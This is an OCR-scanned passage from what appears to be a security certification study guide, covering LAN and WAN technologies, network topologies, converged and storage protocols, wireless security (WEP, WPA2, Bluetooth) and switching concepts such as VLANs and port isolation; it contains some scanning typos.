such as collisions, where two nodes attempt to transmit data simultaneously. 

Ethernet has evolved from 10-megabit buses that used “thinnet” or “thicknet” 
coaxial cable. The star-based physical layer uses Twisted Pair cables that range in 
speed from 10 megabits to 1000 megabits and beyond. A summary of these types is 
listed in Table 5.7. 

CSMA 

Carrier Sense Multiple Access (CSMA) is designed to address collisions. Ethernet is 
baseband media, which is the equivalent of a “party line.” In the early days of phone 


Table 5.7 Types of Ethernet 


Name 

Type 

Speed 

Max. Distance 

10Base2 'Thinnet' 

Bus 

10 megabits 

185 Meters 

10Base5 'Thicknet' 

Bus 

10 megabits 

500 Meters 

lOBaseT 

Star 

10 megabits 

100 Meters 

100BaseT 

Star 

100 megabits 

100 Meters 

lOOOBaseT 

Star 

1000 megabits 

100 Meters 
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service, many people did not have a dedicated phone line for their house: they shared 
a party line with their neighbors. A protocol emerged for using the shared phone line: 

1 . Lift the receiver and listen to determine if the line is idle 

2 . If the line is not idle, hang up and wait before trying again 

3 . If the line is idle, dial 

Ethernet CSMA works in the same fashion, but there is one state that has not been 
accounted for: two neighbors lift their receivers and listen to hear if the line is in use. 
Hearing nothing, both dial simultaneously. Their calls “collide”: the integrity of their 
calls is ruined. CSMA is designed to address collisions. 

Carrier Sense Multiple Access with Collision Detection (CSMA/CD) is used to 
immediately detect collisions within a network. It takes the following steps: 

1 . Monitor the network to see if it is idle 

2 . If the network is not idle, wait a random amount of time 

3 . If the network is idle, transmit 

4 . While transmitting, monitor the network 

5 . If more electricity is received than sent, another station must also be sending 

a. Send Jam signal to tell all nodes to stop transmitting 

b. Wait a random amount of time before retransmitting 

CSMA/CD is used for systems that can send and receive simultaneously, such as 
wired Ethernet. CSMA/CA (Collision Avoidance) is used for systems such as 802. 1 1 
wireless that cannot send and receive simultaneously. CSMA/CA relies on receiving an 
acknowledgement from the receiving station: if no acknowledgement is received, there 
must have been a collision, and the node will wait and retransmit. CSMA/CD is supe- 
rior to CSMA/CA because collision detection detects a collision almost immediately. 

ARCNET& Token Ring 

ARCNET (Attached Resource Computer Network) and Token Ring are two legacy 
LAN technologies. Both pass network traffic via tokens. Possession of a token allows 
a node to read or write traffic on a network. This solves the collision issue faced by 
Ethernet: nodes cannot transmit without a token. 

ARCNET ran at 2.5 megabits and popularized the star topology (later copied by 
Ethernet). The last version of Token Ring ran at 16 megabits, using a physical star 
that passed tokens in a logical ring. 

Both Token Ring and ARCNET are deterministic (not random), unlike Ethernet. 
Both have no collisions, which (among other factors) leads to predictable network 
behavior. Many felt Token Ring was superior to Ethernet (when Ethernet’s top speed 
was 10 megabits). Ethernet was cheaper and ultimately faster than Token Ring, and 
ended up becoming the dominant LAN technology. 

FDD I 

FDDI (Fiber Distributed Data Interface) is another legacy LAN technology, running 
a logical network ring via a primary and secondary counter-rotating fiber optic ring. 
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Node c 


The secondary ring was typically used for fault tolerance. A single FDDI ring runs 
at 100 megabits. FDDI uses a “token bus,” a different token-passing mechanism than 
Token Ring. 

In addition to reliability, another advantage of FDDI is light: fiber cable is not 
affected by electromagnetic interference (EMI). 

LAN PHYSICAL NETWORK TOPOLOGIES 

Physical Network Topologies describe Layer 1 locally: how the cables are physically 
run. There have been many popular physical topologies over the years; many, such as 
the bus and ring, have faded as the star topology has become dominant. 

Bus 

A physical bus connects network nodes in a string, as shown in Figure 5.14. Each 
node inspects the data as it passes along the bus. 

Network buses are fragile: should the network cable break anywhere along the 
bus; the entire bus would go down. For example, if the cable between Node A and 
Node B should break in Figure 5.14, the entire bus would go down, including the 
connection between Node B and C. A single defective NIC can also impact an 
entire bus. 


LEARN BY EXAMPLE 

Breaking the Bus 

A company with a large legacy investment in coaxial 10base2 Thinnet Ethernet moved to a new 
building in 1992. The building had no network cabling; the company had to provide their own. 

The question: should they convert from bus-based Thinnet to star-based category cabling? Fifty 
computers were networked, and the cost of converting NICs from Thinnet to Cat3 was considerable, 
in an age when Ethernet cards cost over $500 each. 

The company decided to stick with Thinnet and therefore an Ethernet bus architecture. Existing 
staff carefully wired the two-floor building with Thinnet, carefully terminating connections and testing 
connectivity. They used four network segments (two per floor), mindful that a cable break or short 
anywhere in a segment would take the bus down, and affect the network in one-fourth of the building. 

Months later, the company suffered financial problems and critical senior staff left the company, 
including the engineers who wired the building with Thinnet. New, less experienced staff, ignorant 
of the properties of coaxial cabling and bus architecture, pulled Thinnet from the walls to extend the 
cable runs, and left it lying exposed on the floor. Staff rolled office chairs across the coaxial cabling 
crushing it, and shorting the inner copper core to the outer copper braid. A quarter of the office lost 
network connectivity. 
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The new junior staff attempted to diagnose the problem without following a formal 
troubleshooting process. They purchased additional network equipment, and connected it to the 
same shorted bus, with predictably poor results. Finally, after weeks of downtime and thousands 
of wasted dollars, a consultant identified the problem and the bus was repaired. NIC prices had 
dropped, so the consultant also recommended migrating to category cabling and a star-based 
physical architecture, where hardware traffic isolation meant one cable crushed by a rolling office 
chair would affect one system, and not dozens. 

Organizations should always strive to retain trained, knowledgeable, and experienced staff. 
When diagnosing network problems, it is helpful to start at layer 1 and work up from there. Begin 
with the physical layer: is the network cable connected and does the NIC show a link? Then layer 2: 
what speed and duplex has the system negotiated? Then layer 3: can you ping localhost (127.0.0. 1), 
and then ping the IP address of the system itself, and then ping the IP address of the default 
gateway, and then ping the IP address of a system on a remote network? 


Tree 

A tree is also called hierarchical network: a network with a root node, and branch 
nodes that are at least three levels deep (two levels would make it a star). The root 
node controls all tree traffic, as shown in Figure 5.15. The tree is a legacy network 
design; the root node was often a mainframe. 
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FIGURE 5.15 Tree Topology 
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Ring 

A physical ring connects network nodes in a ring: if you follow the cable from node 
to node, you will finish where you began, as shown in Figure 5.16. 

Star 

Star topology has become the dominant physical topology for LANs. The star was 
first popularized by ARCNET, and later adopted by Ethernet. Each node is connected 
directly to a central device such as a hub or a switch, as shown in Figure 5.17. 


EXAM WARNING 


Remember that physical and logical topologies are related, but different. A logical ring can run via a 
physical ring, but there are exceptions. FDDI uses both a logical and physical ring, but Token Ring 
is a logical ring topology that runs on a physical star, for example. If you see the word “ring” on the 
exam, check the context to see if it is referring to physical ring, logical ring, or both. 
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Stars feature better fault tolerance: any single local cable cut or NIC failure 
affects one node only. Since each node is wired back to a central point, more cable is 
required as opposed to bus (where one cable run connects nodes to each other). This 
cost disadvantage is usually outweighed by the fault tolerance advantages. 

Mesh 

A mesh interconnects network nodes to each other. Figure 5.18 shows two mesh net- 
works. The left mesh is fully connected, with four Web servers interconnected. The 
right mesh is partially connected: each node has multiple connections to the mesh, 
but every node does not connect to every other. 

Meshes have superior availability and are often used for highly available (HA) 
server clusters. Each of the four Web servers shown on the left in Figure 5.18 can 
share the load of Web traffic, and maintain state information between each other. 
If any web server in the mesh goes down, the others remain up to shoulder the 
traffic load. 

WAN TECHNOLOGIES AND PROTOCOLS 

ISPs and other “long-haul” network providers, whose networks span from cities to 
countries, often use wide Area Network technologies. Many of us have hands-on 
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FIGURE 5.18 Fully Connected and Partially Connected Mesh Topologies 


experience configuring LAN technologies such as connecting Cat5 network cabling; 
it is less common to have hands-on experience building WANs. 

TIs, T3s, Els, E3s 

There are a number of international circuit standards: the most prevalent are T 
Carriers (United States) and E Carriers (Europe). A T1 is a dedicated 1 .544-mega- 
bit circuit that carries twenty-four 64-bit DSO (Digital Signal 0) channels (such 
as 24 circuit-switched phone calls). Note that the terms DS1 (Digital Signal 1) 
and T1 are often used interchangeably. DS1 describes the flow of bits (via any 
medium, such as copper, fiber, wireless, etc.); a T1 is a copper telephone circuit 
that carries a DS1. 

A T3 is 28 bundled TIs, forming a 44.736-megabit circuit. The terms T3 and DS3 
(Digital Signal 3) are also used interchangeably, with the same T1/DS1 distinction 
noted above. Els are dedicated 2.048-megabit circuits that carry 30 channels, and 16 
Els form an E3, at 34.368 megabits. 


NOTE 

T1 and T3 speeds are often rounded off to 1.5 and 45 megabits, respectively. This book will use 
those numbers (and they are also good shorthand for the exam). Beyond the scope of the exam is the 
small amount of bandwidth required for circuit framing overhead. This is the reason 28 TIs times 
1.544 megabits equals 43.232 megabits, a bit lower than the T3 speed of 44.736 megabits. The same 
is true for the El— >E3 math. 


SONET (Synchronous Optical Networking) carries multiple T-carrier circuits via 
fiber optic cable. SONET uses a physical fiber ring for redundancy. 

Frame Relay 

Frame Relay is a packet-switched Layer 2 WAN protocol that provides no error 
recovery and focuses on speed. Higher layer protocols carried by Frame Relay, such 
as TCP/IP can be used to provide reliability. 
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Frame Relay multiplexes multiple logical connections over a single physical 
connection to create Virtual Circuits; this shared bandwidth model is an alterna- 
tive to dedicated circuits such as Tls. A PVC (Permanent Virtual Circuit) is always 
connected, analogous to a real dedicated circuit like a T1 . A Switched Virtual Circuit 
(SVC) sets up each “call,” transfers data, and terminates the connection after an 
idle timeout. Frame Relay is addressed locally via Data Link Connection Identifiers 
(DLCI, pronounced “delsee”). 

X.25 

X.25 is an older packet-switched WAN protocol. X.25 provided a cost-effective way 
to transmit data over long distances in the 1970s through early 1990s, when the most 
common other option was a direct call via analog modem. X.25’s popularity has 
faded as the Internet has become ubiquitous. 

The global packet switched X.25 network is separate from the global IP-based 
Internet. X.25 performs error correction that can add latency on long links. It can 
carry other protocols such as TCP/IP, but since TCP provides its own reliability, there 
is no need to take the extra performance hit by also providing reliability at the X.25 
layer. Other protocols such as frame relay are usually used to carry TCP/IP. 

ATM 

Asynchronous Transfer Mode (ATM) is a WAN technology that uses fixed length 
cells. ATM cells are 53 bytes long, with a 5-byte header and 48-byte data portion. 

ATM allows reliable network throughput compared to Ethernet. The answer to 
“How many Ethernet frames can I send per second” is “It depends.” Normal Ethernet 
frames can range in size from under 100 bytes to over 1500 bytes. In contrast, all 
ATM cells are 53 bytes. 

SMDS (Switched Multimegabit Data Service) is older and similar to ATM, also 
using 53-byte cells. 

MPLS 

Multiprotocol Label Switching (MPLS) provides a way to forward WAN data via 
labels, via a shared MPLS cloud network. This allows MPLS networks to carry many 
types of network traffic, including ATM, Frame relay, IP, and others. Decisions are 
based on labels, and not encapsulated header data (such as an IP header). MPLS can 
carry voice and data, and be used to simplify WAN routing: assume 12 offices con- 
nect to a data center. If Tls were used, the data center would require 12 T1 circuits 
(one to each office); with MPLS, the data center and each office would require a 
single connection to connect to the MPLS cloud. 

SDLC and HDLC 

Synchronous Data Link Control (SDLC) is a synchronous Layer 2 WAN protocol that 
uses polling to transmit data. Polling is similar to token passing; the difference is a primary 
node polls secondary nodes, which can transmit data when polled. Combined nodes can 
act as primary or secondary. SDLC supports NRM transmission only (see below). 
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High-Level Data Link Control (HDLC) is the successor to SDLC. HDLC adds 

error correction and flow control, as well as two additional modes (ARM and ABM). 

The three modes of HDLC are: 

• Normal Response Mode (NRM) — Secondary nodes can transmit when given 
permission by the primary 

• Asynchronous Response Mode (ARM) — Secondary nodes may initiate 
communication with the primary 

• Asynchronous Balanced Mode (ABM) — Combined mode where nodes may act 
as primary or secondary, initiating transmissions without receiving permission 


CONVERGED PROTOCOLS 

“Convergence” is a recent network buzzword. It means providing services such 
as industrial controls, storage and voice (that were typically delivered via non-IP 
devices and networks) via Ethernet and TCP/IP. 

DNP3 

The Distributed Network Protocol (DNP3) provides an open standard used primarily 
within the energy sector for interoperability between various vendors’ SCADA and 
smart grid applications. According to the US Department of Energy, “Smart grid” 
generally refers to a class of technology people are using to bring utility electric- 
ity delivery systems into the 21st century, using computer-based remote control and 
automation. These systems are made possible by two-way communication technol- 
ogy and computer processing that has been used for decades in other industries. They 
are beginning to be used on electricity networks, from the power plants and wind 
farms all the way to the consumers of electricity in homes and businesses. They of- 
fer many benefits to utilities and consumers - mostly seen in big improvements in 
energy efficiency on the electricity grid and in the energy users’ homes and offices. [8] 
Some protocols, such as SMTP, fit into one layer. DNP3 is a multilayer protocol 
and may be carried via TCP/IP (another multilayer protocol): “Many vendors offer 
products that operate using TCP/IP to transport DNP3 messages in lieu of the media 
discussed above. Link layer frames, which we have not talked about yet, are embed- 
ded into TCP/IP packets. This approach has enabled DNP3 to take advantage of 
Internet technology and permitted economical data collection and control between 
widely separated devices.” [9] 

Recent improvements in DNP3 allow for “Secure Authentication,” which ad- 
dresses challenges with the original specification that could have allowed, for exam- 
ple, spoofing or replay attacks. DNP3 became an IEEE standard in 2010, called IEEE 
1815-2010 (now deprecated). It allowed pre-shared keys only. IEEE 1815-2012 is 
the current standard; it supports Public Key Infrastructure (PKI). 

Storage Protocols 

Fibre Channel over Ethernet (FCoE) and Internet Small Computer System Interface 
(iSCSI) are both Storage Area Network (SAN) protocols that provide cost-effective 
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ways to leverage existing network infrastructure technologies and protocols to 
interface with storage. A Storage Area Network allows block-level file access across 
a network, just like a directly attached hard drive. Note that fibre channel uses the 
Canadian/UK spelling of “fibre,” while fiber optic cable typically uses the American 
spelling of “fiber.” 

FCoE leverages Fibre Channel, which has long been used for storage networking, 
but dispenses with the requirement for completely different cabling and hardware. 
Instead, FCoE can be transmitted across standard Ethernet networks. In FCoE, Fibre 
Channel’s HBA (Host Bus Adapters), which historically were unique cards to inter- 
face with storage, can be combined with the network interface (NIC), for economies 
of scale. FCoE uses Ethernet, but not TCP/IP. Fibre Channel over IP (FCIP) encap- 
sulates Fibre Channel frames via TCP/IP. 

Like FCoE, iSCSI is a SAN protocol that allows for leveraging existing networking 
infrastructure and protocols to interface with storage. While FCoE simply uses Ether- 
net, iSCSI makes use of higher layers of the TCP/IP suite for communication, and can 
be routed like any IP protocol (the same is true for FCIP). By employing protocols be- 
yond layer 2 (Ethernet), iSCSI can be transmitted beyond just the local network. Thus, 
iSCSI could even allow for accessing storage that resides across a WAN. iSCSI uses 
Logical Unit Numbers (LUNs) to provide a way of addressing storage across the net- 
work. LUNs can also be used for basic access control for network accessible storage. 

Virtual SAN 

Storage Area Networks have historically tended to be rather proprietary and used 
dedicated hardware and protocols that did not easily interoperate. Though many 
SAN implementations now leverage protocols such as FCoE, FCIP, or iSCSI 
that can allow for converged traditional networking technologies and protocols, 
the scalability and security of the Storage Area Networking has often proven 
cumbersome. 

Traditional approaches to storage security often required hard-coding changes at 
switches or the HBAs to achieve access control. One approach to a virtual SAN feels 
analogous to the switching concept of VLANs and tries to allow for a conceptually 
simplistic approach to isolation within the SAN. This concept of the virtual SAN as 
analogous to VLANs is most commonly employed by networking vendors. 

The concept of a virtual SAN is not limited to simply security considerations from 
networking vendors. Much recent use of the term virtual SAN leans heavily on the 
virtual side of the phrase. Virtualization vendors employ the term virtual SAN to imply 
an approach to the SAN that allows for more rapid provisioning of virtualized storage. 
Beyond provisioning, virtualization vendors tout the virtual SAN as a means to lever- 
age virtualization to afford simpler linear scalability to the storage area network. 

VoIP 

Voice over Internet Protocol (VoIP) carries voice via data networks, a fundamental 
change from analog POTS (Plain Old Telephone Service), which remains in use after 
over 100 years. VoIP brings the advantages of packet-switched networks, such as 
lower cost and resiliency, to the telephone. 
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FIGURE 5.19 Wireshark “VoIP Calls” 


Recently, many organizations have maintained at least two distinct networks: a 
phone network and a data network, each with associated maintenance costs. The 
reliability of packet-switched data networks has grown as organizations have made 
substantial investments. With the advent of VoIP, many organizations have lowered 
costs by combining voice and data services on packet-switched networks. 

Common VoIP protocols include Real-time Transport Protocol (RTP), designed 
to carry streaming audio and video. VoIP protocols such as RTP rely upon session 
and signaling protocols including SIP ( Session Initiation Protocol, a signaling proto- 
col) and H.323. SRTP (Secure Real-time Transport Protocol) may be used to provide 
secure VoIP, including confidentiality, integrity, and secure authentication. SRTP 
uses AES for confidentiality and SHA-1 for integrity. 

While VoIP can provide compelling cost advantages (especially for new sites, 
without a large legacy voice investment), there are security concerns. If the network 
goes down, both voice and network data go down. Also, there is no longer a true “out 
of band” channel for wired voice. If an attacker has compromised a network, they 
may be able to compromise the confidentiality or integrity of the VoIP calls on that 
network. Many VoIP protocols, such as RTP, provide little or no security by default. 
In that case, eavesdropping on a VoIP call is as simple as sniffing with a tool like 
Wireshark (a high-quality free network protocol analyzer, see http://www. wireshark. 
org), selecting the “Telephony — > VoIP Calls” menu, choosing a call and pressing 
“Player,” as shown in Figure 5.19. 

Organizations that deploy VoIP must ensure reliability by making sufficient 
investments in their data networks, and in staff expertise required to support them. 
In the event of network compromise, use other methods such as cell phones for 
out-of-band communication. Finally, any VoIP traffic sent via insecure networks 
should be secured via SRTP, or other methods such as IPsec. Never assume VoIP 
traffic is secure by default. 

SOFTWARE-DEFINED NETWORKS 

Through virtualization and cloud services, storage and compute are increasingly 
decoupled from the traditional server and disk-dense datacenter. Software-defined 
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networking (SDN) seeks a similar paradigm shift on organizations’ approach to 
networking. A helpful oversimplification can be to think of SDN as an approach 
to virtualize networking and decouple networking from the hardware typically 
employed for this purpose. 

Software Defined Networking (SDN) separates a router’s control plane from 
the data (forwarding) plane. The control plane makes routing decisions. The data 
plane forwards data (packets) through the router. With SDN routing decisions are 
made remotely, instead of on each individual router. 

One of the primary goals of SDN is to allow for nimble and customizable net- 
working capabilities. A hallmark of SDN is the potential for achieving this flexibility 
using inexpensive “white-box” networking hardware and open protocols rather than 
traditional proprietary hardware, firmware, and software. Another common goal with 
SDN is to accommodate dynamic instantiation of networking capabilities rules as 
they become needed within the infrastructure. 

The most well-known protocol in this space is OpenFlow, which can, among 
other capabilities, allow for control of switching rules to be designated or updated at 
a central controller. OpenFlow is a TCP protocol that uses TLS encryption. 

WIRELESS LOCAL AREA NETWORKS 

Wireless Local Area Networks (WLANs) transmit information via electromagnetic 
waves (such as radio) or light. Historically, wireless data networks have been very 
insecure, often relying on the (perceived) difficulty in attacking the confidentiality 
or integrity of the traffic. This perception is usually misplaced. The most common 
form of wireless data networking is the 802. 1 1 wireless standard, and the first 802. 1 1 
standard that provides reasonable security is 802.1 li. 

DoS & Availability 

WLANs have no way to assure availability. An attacker with physical proximity can 
launch a variety of Denial-of-Service attacks, including simply polluting the wireless 
spectrum with noise. If you think of the CIA triad as a three-legged stool, “wireless 
security” is missing a leg. Critical applications that require a reliable network should 
use wired connections. 

Unlicensed Bands 

A “band” is a small amount of contiguous radio spectrum. Industrial, Scientific, and 
Medical (ISM) bands are set aside for unlicensed use, meaning you do not need to 
acquire a license from an organization such as the Federal Communications Com- 
mission (FCC) to use them. Many wireless devices such as cordless phones, 802.1 1 
wireless, and Bluetooth use ISM bands. Different countries use different ISM bands: 
two popular ISM bands used internationally are 2.4 and 5 GHz. 

FHSS, DSSS and OFDM 

Frequency Hopping Spread Spectrum (FHSS) and Direct Sequence Spread Spectrum 
(DSSS) are two methods for sending traffic via a radio band. Some bands, like the 
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Table 5.8 Types of 802.11 Wireless 


Type 

Top Speed 

Frequency 

802.11 

2 Mbps 

2.4 GHz 

802.11a 

54 Mbps 

5 GHz 

802.11b 

11 Mbps 

2.4 GHz 

802.1 1q 

54 Mbps 

2.4 GHz 

802.1 In 

72-600 Mbps 

2.4 GHz and/or 5 
GHz 

802.1 lac 

422 Mbps-1.3 
Gbps 

5 GHz 


2.4-GHz ISM band, can be quite polluted with interference: Bluetooth, some cord- 
less phones, some 802.11 wireless, baby monitors, and even microwaves can broad- 
cast or interfere with this band. Both DSSS and FHSS are designed to maximize 
throughput while minimizing the effects of interference. 

DSSS uses the entire band at once, “spreading” the signal throughout the band. 
FHSS uses a number of small frequency channels throughout the band and “hops” 
through them in pseudorandom order. 

Orthogonal Frequency-Division Multiplexing (OFDM) is a newer multiplexing 
method, allowing simultaneous transmission using multiple independent wireless 
frequencies that do not interfere with each other. 

802. 1 1 

802.11 wireless has many standards, using various frequencies and speeds. The origi- 
nal mode is simply called 802.11 (sometimes 802.11-1997, based on the year it was 
created), which operated at 2 megabits per second (Mbps) using the 2.4 GHz fre- 
quency; it was quickly supplanted by 802.11b, at 1 1 Mbps. 802.1 lg was designed to 
be backwards compatible with 802.1 lb devices, offering speeds up to 54 Mbps using 
the 2.4 GHz frequency. 802.11a offers the same top speed, using the 5 GHz frequency. 

802.1 In uses both 2.4 and 5 GHz frequencies, and is able to use multiple antennas 
with multiple-input multiple-output (MIMO). This allows speeds up to 600 Mbps. 
Finally, 802.1 lac uses the 5 GHz frequency only, offering speeds up to 1.3 Gbps. 
Table 5.8 summarizes the major types of 802.1 1 wireless. 

The 2.4 GHz frequency can be quite crowded: some cordless phones and baby 
monitors use that frequency, as does Bluetooth and some other wireless devices. 
Microwave ovens can interfere with 2.4 GHz devices. The 5 GHz frequency is usu- 
ally less crowded, and often has less interference than 2.4 GHz. As 5 GHz is a higher 
frequency with shorter waves, it does not penetrate walls and other obstructions as 
well as the longer 2.4 GHz waves. 

Managed, Master, Ad-Hoc and Monitor modes 

802.1 1 wireless NICs can operate in four modes: managed, master, ad hoc, and mon- 
itor mode. 
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802. 1 1 wireless clients connect to an access point in managed mode (also called 
client mode). Once connected, clients communicate with the access point only; they 
cannot directly communicate with other clients. 

Master mode (also called infrastructure mode) is the mode used by wireless 
access points. A wireless card in master mode can only communicate with connected 
clients in managed mode. 

Ad hoc mode is a peer-to-peer mode with no central access point. A computer 
connected to the Internet via a wired NIC may advertise an ad hoc WLAN to allow 
Internet sharing. 

Finally, monitor mode is a read-only mode used for sniffing WLANs. Wireless 
sniffing tools like Kismet or Wellenreiter use monitor mode to read all 802.1 1 wire- 
less frames. 

SSID and MAC Address Filtering 

802.11 WLANs use a Service Set Identifier (SSID), which acts as a network name. 
Wireless clients must know the SSID before joining that WLAN, so the SSID is a 
configuration parameter. SSIDs are normally broadcasted; some WLANs are config- 
ured to disable SSID broadcasts, as a security feature. Relying on the secrecy of the 
SSID is a poor security strategy: a wireless sniffer in monitor mode can detect 
the SSID used by clients as they join WLANs; this is true even if SSID broadcasts 
are disabled. 

Another common 802. 1 1 wireless security precaution is restricting client access 
by filtering the wireless MAC address, allowing only trusted clients. This provides 
limited security. MAC addresses are exposed in plaintext on 802.1 1 WLANs; trusted 
MACs can be sniffed, and an attacker may reconfigure a non-trusted device with a 
trusted MAC address in software. Then the attacker can wait for the trusted device to 
leave the network (or launch a DoS against the trusted device), and join the network 
with a trusted MAC address. 

WEP 

WEP is the Wired Equivalent Privacy protocol, an early attempt (first ratified in 
1999) to provide 802.11 wireless security. WEP has proven to be critically weak: 
new attacks can break any WEP key in minutes. Due to these attacks, WEP effective- 
ly provides little integrity or confidentiality protection. WEP is considered broken 
and its use is strongly discouraged. The encryption algorithms specified in 802.1 li 
and/or other encryption methods such as VPN should be used in place of WEP. 

WEP was designed at a time when exportation of encryption was more regu- 
lated than it is today, and was designed specifically to avoid conflicts with existing 
munitions laws (see Chapter 4, Domain 3: Security Engineering for more informa- 
tion about such laws). In other words, WEP was designed to be “not too strong,” 
cryptographically, and it turned out to be even weaker than anticipated. WEP has 40 
and 104-bit key lengths, and uses the RC4 cipher. WEP frames have no timestamp 
and no replay protection: attackers can inject traffic by replaying previously sniffed 
WEP frames. 
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802 . 1 li 

802.1 li is the first 802.11 wireless security standard that provides reasonable 
security. 802.1 li describes a Robust Security Network (RSN), which allows plug- 
gable authentication modules. RSN allows changes to cryptographic ciphers as new 
vulnerabilities are discovered. 

RSN is commonly referred to as WPA2 (Wi-Fi Protected Access 2), a full imple- 
mentation of 802.1 li. By default, WPA2 uses AES encryption to provide confidenti- 
ality, and CCMP (Counter Mode CBC MAC Protocol) to create a Message Integrity 
Check (MIC), which provides integrity. The less secure WPA (without the “2”) was 
designed for access points that lack the power to implement the full 802.1 li standard, 
providing a better security alternative to WEP. WPA uses RC4 for confidentiality and 
TRIP for integrity. Usage of WPA2 is recommended over WPA. 

Bluetooth 

Bluetooth , described by IEEE standard 802.15, is a Personal Area Network (PAN) 
wireless technology, operating in the same 2.4 GHz frequency as many types of 802. 1 1 
wireless devices. Bluetooth can be used by small low-power devices such as cell 
phones to transmit data over short distances. Bluetooth versions 2. 1 and older operate 
at 3 Mbps or less; Versions 3 (announced in 2009) and higher offer far faster speeds. 

Bluetooth has three classes of devices, summarized below. Although Bluetooth 
is designed for short-distance networking, it is worth noting that class 1 devices can 
transmit up to 100 meters. 

• Class 3: under 10 meters 

• Class 2: 10 meters 

• Class 1: 100 meters 

Bluetooth uses the 128-bit E0 symmetric stream cipher. Cryptanalysis of E0 has 
proven it to be weak; practical attacks show the true strength to be 38 bits or less. 

Sensitive devices should disable automatic discovery by other Bluetooth devices. 
The “security” of discovery relies on the secrecy of the 48-bit MAC address of 
the Bluetooth adapter. Even when disabled, Bluetooth devices may be discovered 
by guessing the MAC address. The first 24 bits are the OUI, which may be easily 
guessed; the last 24 bits may be determined via brute-force attack. For example, many 
Nokia phones use the OUI of 00:02:EE. If an attacker knows that a target device is a 
Nokia phone, the remaining challenge is guessing the last 24 bits of the MAC address. 


RFID 

Radio Frequency Identification (RFID) is a technology used to create wirelessly 
readable tags for animals or objects. There are three types of RFID tags: Active, 
semi-passive, and passive. Active and semi-passive RFID tags have a battery. An 
active tag broadcasts a signal; semi-passive RFID tags rely on a RFID reader’s signal 
for power. Passive RFID tags have no battery, and also rely on the RFID reader’s 
signal for power. 
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Active RFID tags can operate via larger distances. Devices like toll transponders 
(allowing automatic payment of highway tolls) use active tags. Passive RFID tags 
are less expensive; they are used for applications such as tracking inventory in a 
warehouse. 

RFID signals may be blocked with a Faraday Cage, which shields enclosed 
objects from EMI. Electricity will seek to go around a conductive object rather than 
through it (like lightning hitting a car: the occupants inside are usually unharmed). A 
Faraday Cage is a metal cage or enclosure that acts as the conductive object, protect- 
ing objects inside. This blocks many radio signals, including RFID. 

The cage can be as simple as aluminum foil wrapped around an object. Instruc- 
tions for building a Faraday Cage wallet (designed to protect smart cards with RFID 
chips) from aluminum foil and duct tape are available at: http://howto.wired.com/ 
wiki/M ake_a_Faraday_Cage_Wallet. 


SECURE NETWORK DEVICES AND PROTOCOLS 

Let us look at network devices ranging from Layer 1 hubs through Application-Layer 
Proxy firewalls that operate up to Layer 7. Many of these network devices, such as 
routers, have protocols dedicated to their use, such as routing protocols. 

REPEATERS AND HUBS 

Repeaters and hubs are layer 1 devices. A repeater receives bits on one port, and 
“repeats” them out the other port. The repeater has no understanding of protocols; it 
simply repeats bits. Repeaters are often used to extend the length of a network. 

A hub is a repeater with more than two ports. It receives bits on one port and 
repeats them across all other ports. 

Hubs were quite common before switches became common and inexpensive. 
Hubs provide no traffic isolation and have no security: all nodes see all traffic sent 
by the hub. Hubs provide no confidentiality or integrity; an attacker connected to hub 
may read and potentially alter traffic sent via the hub. 

Hubs are also half-duplex devices: they cannot send and receive simultaneously. Any 
device connected to a hub will negotiate to half duplex mode, which can cause network 
congestion. Hubs also have one “collision domain”: any node may send colliding traffic 
with another (for more information on collisions, see previous “CSMA” section). 

The lack of security, half duplex mode, and large collision domain make hubs 
unsuitable for most modern purposes. One exception is network forensics: hubs may 
be used to provide promiscuous access for a forensic investigator. Other options, like 
TAPs and Switch SPAN ports (see below), are usually a better choice. 

BRIDGES 

Bridges and switches are Layer 2 devices. A bridge has two ports, and connects net- 
work segments together. Each segment typically has multiple nodes, and the bridge 
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FIGURE 5.20 Network Bridge 


learns the MAC addresses of nodes on either side. Traffic sent from two nodes on 
the same side of the bridge will not be forwarded across the bridge. Traffic sent from 
a node on one side of the bridge to the other side will forward across. The bridge 
provides traffic isolation and makes forwarding decisions by learning the MAC 
addresses of connected nodes. 

In Figure 5.20, traffic sent from Computer 1 to Computer 2 will not forward 
across the bridge. Traffic sent from Computer 1 to Computer 3 will be forwarded 
across the bridge. 

A bridge has two collision domains. A network protocol analyzer (informally 
called a “sniffer”) on the right side of the network shown in Figure 5.20 can sniff 
traffic sent to or from Computers 3 and 4, but not sniff Computer 1 or 2 traffic (unless 
sent to Computers 3 or 4). 

SWITCHES 

A switch is a bridge with more than two ports. Also, it is best practice to only connect 
one device per switch port. Otherwise, everything that is true about a bridge is also 
true about a switch. 

Figure 5.21 shows a network switch. The switch provides traffic isolation by 
associating the MAC address of each computer and server with its port. Traffic sent 
between Computer 1 and Server 1 remains isolated to their switch ports only: a 
network sniffer running on Server 3 will not see that traffic. 

A switch shrinks the collision domain to a single port. You will normally have no 
collisions assuming one device is connected per port (which is best practice). 

Trunks are used to connect multiple switches. 

VLANs 

A VLAN is a Virtual LAN, which can be thought of as a virtual switch. In Figure 5.21, 
imagine you would like to create a computer LAN and a server LAN. One option is 
to buy a second switch, and dedicate one for computers and one for servers. 
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FIGURE 5.21 



Another option is to create a VLAN on the original switch, as shown in 
Figure 5.22. That switch has two VLANs, and acts as two virtual switches: a 
computer switch and a server switch. 

The VLAN in Figure 5.22 has two broadcast domains. Traffic sent to MAC 
address FF:FF:FF:FF:FF:FF by computers 1-3 will reach the other computers, but 
not the servers on the Server VLAN. Inter- VLAN communication requires layer 3 
routing, discussed in the next section. 

VLANs may also add defense-in-depth protection to networks; for example, 
using VLANs to segment data and management network traffic. 

Port Isolation 

The concept of port isolation is not new, but has been revitalized and more com- 
monly employed with the increasing density of virtualized systems in datacenters. 
Traditional port isolation focused on using software in a managed switch to isolate 
a port such that it could only communicate to the designated uplink. This port isola- 
tion, also commonly referred to as a Private VLAN or PVLAN, can be used to ensure 
that individual systems cannot interact with other resources even if logically on the 
same subnet. From a security standpoint this could severely limit the ability of an 
adversary to pivot or move laterally within an organization after successfully com- 
promising a system. 

Architecturally, implementing widespread traditional port isolation/PVLANs has 
seemed to prove cumbersome for many organizations. However, with heavily virtual- 
ized infrastructures, port isolation has found a resurgence. Port isolation can prove 
tremendously useful in multi-tenant environments to help ensure isolation amongst 
customers being serviced by the same hypervisor. Likewise, even in internal virtual 
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FIGURE 5.22 Switch VLAN 


infrastructures, there are often systems that have no need of direct access to one 
another, but are fronted by the same hypervisor. Port isolation can help to ensure 
logical segmentation even within a single vswitch (virtual switch). 

SPAN ports 

Since switches provide traffic isolation, a Network Intrusion Detection System 
(NIDS) connected to a 24-port switch will not see unicast traffic sent to and from 
